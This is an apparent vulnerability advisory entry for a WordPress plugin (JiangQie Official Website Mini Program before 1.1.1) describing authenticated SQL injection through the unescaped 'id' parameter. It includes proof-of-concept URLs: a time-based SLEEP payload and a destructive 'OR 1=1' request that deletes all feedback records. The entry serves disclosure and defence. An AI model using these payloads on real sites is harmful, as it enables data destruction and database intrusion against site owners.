WordPress Plugin Vulnerabilities
JiangQie Official Website Mini Program < 1.1.1 - Authenticated SQL Injection
Description
The plugin does not escape or validate the id GET parameter before using it in SQL statements, leading to SQL injection issues
Proof of Concept
https://example.com/wp-admin/admin.php?page=jiangqie_ow_free_feedback&action=detail&id=1+AND+%28SELECT+%2A+FROM+%28SELECT%28SLEEP%285%29%29%29a%29 Could also make a logged in admin delete all the records: https://example.com/wp-admin/admin.php?page=jiangqie_ow_free_feedback&action=delete&id=1+OR+1%3D1
Affects Plugins
References
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
wangxiaohui@webray.com.cn inc
Submitter
wangxiaohui@webray.com.cn inc
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-07-30 (about 2 years ago)
Added
2021-08-05 (about 2 years ago)
Last Updated
2021-08-10 (about 2 years ago)